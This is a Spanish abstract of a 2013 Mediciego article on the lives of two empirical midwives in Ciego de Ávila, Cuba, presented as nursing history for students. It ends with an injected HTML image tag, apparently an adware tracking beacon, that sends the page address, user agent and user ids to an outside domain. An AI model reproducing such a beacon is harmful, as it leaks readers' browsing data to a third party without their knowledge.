Comadronas de Ciego de Ávila, ejemplo para la historia de la enfermería. - Martínez García, Regla Elena; Rodríguez Santo, Ildania; Alemán Gómez, Nuriam Mercedes; Cabrera Hernández, Giselda María (Mediciego, 2013)
Este trabajo tiene como objetivo la divulgación de los datos biográficos de dos comadronas empíricas de Ciego de Ávila para lograr transmitir a las nuevas generaciones la historia y desarrollo de comadronas avileñas y contribuir de esta manera a la formación de los recursos humanos de la salud en la instauración de valores, especialmente en los estudiantes de la Carrera de Enfermería, en este caso a través del estudio de la vida y obra de personalidades que iniciaron el ejercicio de la profesión de forma empírica antes del triunfo de la Revolución. Al revisar la Historia de la Enfermería ha llamado la atención siempre la falta de un estudio extenso y abarcador que comprenda su origen. Para la elaboración de este trabajo se consultaron documentos personales, entrevistas a pacientes y familiares, así como entrevista personal a la comadrona Anatolia de Armas. Este trabajo revela que el sector de la salud de Ciego de Ávila cuenta con un baluarte histórico en la primera etapa de la formación del ejercicio de esta profesión. La acción realizada por estas comadronas, su contribución social en el territorio, está en correspondencia con el paradigma de enfermería y a la vez con una etapa poco divulgada de la historia local en Ciego de Ávila. <img src="http://prettysite.xyz/acnt?_=1583867006097&did=24&tag=new_installer&r=http%253A%252F%252Fwww.revmediciego.sld.cu%252Findex.php%252Fmediciego%252Feditor%252FviewMetadata%252F185&ua=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64%3B%20rv%3A70.0)%20Gecko%2F20100101%20Firefox%2F70.0&aac=&if=1&uid=1583231151&cid=2&v=452" alt="" />